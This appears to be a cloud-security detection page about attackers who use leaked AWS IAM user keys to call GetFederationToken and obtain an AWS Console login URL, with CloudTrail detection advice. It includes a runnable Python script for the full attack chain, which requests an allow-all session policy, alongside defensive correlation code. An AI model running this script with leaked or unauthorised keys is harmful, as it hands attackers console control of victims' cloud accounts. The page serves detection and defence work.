About
An attacker holding leaked programmatic credentials, such as a long-lived AWS IAM user access key, can call the GetFederationToken API to obtain temporary credentials and turn them into a sign-in URL that authenticates to the AWS Console.
Understanding Impact
Business Impact
The AWS Console exposes your entire cloud environment. An attacker who reaches it is limited only by the permissions of the compromised IAM user, and service or automation users are frequently over-privileged. It is a common misconception that machine or programmatic credentials cannot be used to authenticate to the AWS Console; they can.
Technical Impact
While long-lived IAM user access keys are typically referred to as "programmatic credentials," they can also be used to authenticate to the AWS Console. The attacker first calls GetFederationToken with the leaked access key to obtain temporary credentials (an access key ID, secret key and session token) for a federated user. The call requires long-lived IAM user credentials and the sts:GetFederationToken permission, and the resulting session's permissions are the intersection of the IAM user's own policies and the session policy passed in the call, so an attacker passes a broad policy to inherit everything the user can do. The temporary credentials are then exchanged with the AWS federation endpoint (https://signin.aws.amazon.com/federation) for a sign-in token, which is embedded in a sign-in URL; opening that URL in a browser yields an authenticated console session. The process is straightforward to execute by hand and is automated by tools like aws-vault (its login subcommand) or aws_consoler.
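The chain described above, written out as an added example (this is not code from the page, aws-vault or aws_consoler). The URL-building helpers are pure and run offline; the two network steps (the STS call via boto3 and the federation endpoint call) run only when the module is executed directly with live IAM user keys. The session policy, federated user name, issuer string and destination are assumptions chosen for the example.

```python
"""Console sign-in from leaked IAM user keys via GetFederationToken.

Added example, not from the original page or from aws-vault/aws_consoler.
Offline helpers build the federation-endpoint URLs; get_federation_token()
and fetch_signin_token() talk to AWS and run only from __main__.
"""
import json
import sys
import urllib.parse
import urllib.request

FEDERATION_ENDPOINT = "https://signin.aws.amazon.com/federation"
CONSOLE_HOME = "https://console.aws.amazon.com/"  # assumed destination

# Session policy passed to GetFederationToken (assumption for the example).
# The federated session's effective permissions are the intersection of this
# policy and the IAM user's identity policies; passing no policy at all
# yields a session with no permissions, so attackers pass a broad one.
ADMIN_SESSION_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})


def get_federation_token(access_key, secret_key, name="console", duration=3600):
    """Exchange long-lived IAM user keys for temporary federated credentials.

    GetFederationToken is only accepted with long-lived IAM user (or root)
    keys, never with role-session credentials, and needs sts:GetFederationToken.
    Network call: requires boto3 and live credentials.
    """
    import boto3  # imported here so the offline helpers need no boto3
    sts = boto3.client("sts", aws_access_key_id=access_key,
                       aws_secret_access_key=secret_key)
    resp = sts.get_federation_token(Name=name, Policy=ADMIN_SESSION_POLICY,
                                    DurationSeconds=duration)
    return resp["Credentials"]  # AccessKeyId, SecretAccessKey, SessionToken


def session_blob(access_key, secret_key, session_token):
    """JSON document the federation endpoint expects in its Session parameter."""
    return json.dumps({
        "sessionId": access_key,
        "sessionKey": secret_key,
        "sessionToken": session_token,
    })


def signin_token_url(blob):
    """Action=getSigninToken request URL; the response is {"SigninToken": ...}."""
    return (FEDERATION_ENDPOINT + "?Action=getSigninToken&Session="
            + urllib.parse.quote_plus(blob))


def fetch_signin_token(blob):
    """Network call: ask the federation endpoint for a sign-in token."""
    with urllib.request.urlopen(signin_token_url(blob), timeout=10) as resp:
        return json.loads(resp.read())["SigninToken"]


def console_login_url(signin_token, destination=CONSOLE_HOME, issuer="example"):
    """Final Action=login URL; opening it in a browser signs the user in."""
    query = urllib.parse.urlencode({
        "Action": "login",
        "Issuer": issuer,  # free-form label shown to the user; assumed value
        "Destination": destination,
        "SigninToken": signin_token,
    })
    return FEDERATION_ENDPOINT + "?" + query


def url_params(url):
    """Query parameters of a URL as a flat dict, for inspection and tests."""
    parsed = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return {k: v[0] for k, v in parsed.items()}


def login_url_from_iam_keys(access_key, secret_key):
    """Full chain: IAM keys -> GetFederationToken -> getSigninToken -> login URL."""
    creds = get_federation_token(access_key, secret_key)
    blob = session_blob(creds["AccessKeyId"], creds["SecretAccessKey"],
                        creds["SessionToken"])
    return console_login_url(fetch_signin_token(blob))


if __name__ == "__main__":
    # Usage (live): python federate.py AKIA... <secret-access-key>
    print(login_url_from_iam_keys(sys.argv[1], sys.argv[2]))
```

The sign-in token returned by getSigninToken is short-lived, so the login URL must be opened promptly; the console session itself lasts as long as the federated credentials.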
Detection
You can identify when an IAM user calls GetFederationToken and then authenticates to the AWS Console using the CloudTrail events GetFederationToken (eventSource sts.amazonaws.com, userIdentity.type IAMUser) and ConsoleLogin (eventSource signin.amazonaws.com). In the ConsoleLogin event, userIdentity.type is FederatedUser, userIdentity.arn has the form arn:aws:sts::<account>:federated-user/<name>, and userIdentity.sessionContext.sessionIssuer identifies the IAM user whose key was used. Because GetFederationToken is the only API that mints federated-user credentials, any successful ConsoleLogin by a FederatedUser deserves an alert, particularly when the issuing IAM user is an automation identity that should never use the console. Note that GetFederationToken calls made through the global STS endpoint are recorded in the us-east-1 region of your trail.
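The correlation described above, run over a handful of constructed CloudTrail records. This is an added example, not Datadog's rule logic; the records are made up for the example and mirror CloudTrail's documented field layout (account ID, user names, key IDs and IP addresses are fictitious). The 36-hour matching window is the maximum DurationSeconds an IAM user may request from GetFederationToken.

```python
"""Correlate GetFederationToken with federated ConsoleLogin in CloudTrail.

Added example for this page; not Datadog's detection rule. SAMPLE_EVENTS
are constructed records that follow CloudTrail's documented field layout.
"""
from datetime import datetime

# Longest-lived federated session an IAM user can request (36 h): a console
# login from those credentials must occur before they expire.
MAX_FEDERATION_LIFETIME = 129600

SAMPLE_EVENTS = [  # constructed, not real trail data
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetFederationToken", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot",
                      "arn": "arn:aws:iam::123456789012:user/deploy-bot",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"},
     "requestParameters": {"name": "console", "durationSeconds": 3600},
     "responseElements": {
         "credentials": {"accessKeyId": "ASIAIOSFODNN7EXAMPLE",
                         "expiration": "May 1, 2024, 11:00:00 AM"},
         "federatedUser": {"federatedUserId": "123456789012:console",
                           "arn": "arn:aws:sts::123456789012:federated-user/console"}}},
    {"eventTime": "2024-05-01T10:00:05Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "FederatedUser",
                      "arn": "arn:aws:sts::123456789012:federated-user/console",
                      "accessKeyId": "ASIAIOSFODNN7EXAMPLE",
                      "sessionContext": {"sessionIssuer": {
                          "type": "IAMUser", "userName": "deploy-bot",
                          "arn": "arn:aws:iam::123456789012:user/deploy-bot"}}},
     "responseElements": {"ConsoleLogin": "Success"}},
    # Benign: a human IAM user signing in with a password.
    {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "alice",
                      "arn": "arn:aws:iam::123456789012:user/alice"},
     "responseElements": {"ConsoleLogin": "Success"}},
    # Federated login whose GetFederationToken call is not in this batch
    # (for example, logged in another region): still flagged.
    {"eventTime": "2024-05-01T11:30:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.44",
     "userIdentity": {"type": "FederatedUser",
                      "arn": "arn:aws:sts::123456789012:federated-user/ops",
                      "sessionContext": {"sessionIssuer": {
                          "type": "IAMUser", "userName": "ci-runner",
                          "arn": "arn:aws:iam::123456789012:user/ci-runner"}}},
     "responseElements": {"ConsoleLogin": "Success"}},
    # Failed federated login: not a successful console session, ignored.
    {"eventTime": "2024-05-01T11:31:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.44",
     "userIdentity": {"type": "FederatedUser",
                      "arn": "arn:aws:sts::123456789012:federated-user/ops"},
     "responseElements": {"ConsoleLogin": "Failure"}},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def index_federation_tokens(events):
    """Map federated-user ARN -> GetFederationToken events that minted it."""
    index = {}
    for ev in events:
        if (ev.get("eventSource") != "sts.amazonaws.com"
                or ev.get("eventName") != "GetFederationToken"):
            continue
        fed = (ev.get("responseElements") or {}).get("federatedUser") or {}
        if fed.get("arn"):
            index.setdefault(fed["arn"], []).append(ev)
    return index


def detect_federated_console_logins(events, window=MAX_FEDERATION_LIFETIME):
    """Flag every successful ConsoleLogin by a FederatedUser.

    Each finding names the issuing IAM user (from sessionIssuer) and, when a
    GetFederationToken event for the same federated ARN precedes the login
    within `window` seconds, the long-lived access key that was used.
    """
    tokens = index_federation_tokens(events)
    findings = []
    for ev in events:
        if (ev.get("eventSource") != "signin.amazonaws.com"
                or ev.get("eventName") != "ConsoleLogin"):
            continue
        ident = ev.get("userIdentity") or {}
        if ident.get("type") != "FederatedUser":
            continue
        if (ev.get("responseElements") or {}).get("ConsoleLogin") != "Success":
            continue
        login_at = _ts(ev["eventTime"])
        issuer = ((ident.get("sessionContext") or {}).get("sessionIssuer") or {}).get("arn")
        minted = None
        for gft in tokens.get(ident.get("arn"), []):
            age = (login_at - _ts(gft["eventTime"])).total_seconds()
            if 0 <= age <= window:
                minted = gft
                break
        minted_ident = (minted or {}).get("userIdentity") or {}
        findings.append({
            "login_time": ev["eventTime"],
            "federated_user": ident.get("arn"),
            "iam_user": issuer or minted_ident.get("arn"),
            "iam_access_key": minted_ident.get("accessKeyId"),
            "source_ip": ev.get("sourceIPAddress"),
            "get_federation_token_seen": minted is not None,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_federated_console_logins(SAMPLE_EVENTS):
        print(finding)
```

The iam_access_key in a finding is the long-lived key to rotate or delete first; the sourceIPAddress on the GetFederationToken and ConsoleLogin events usually match and give the attacker's egress address.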
How Datadog can help
Cloud SIEM
Datadog Cloud SIEM detects this attack using the following out-of-the-box rules:
References
GetFederationToken API (AWS documentation)
About sign-in URLs (AWS documentation)
Create a Console Session from IAM Credentials (hackingthe.cloud)
aws_consoler tool (github.com)
aws-vault (github.com)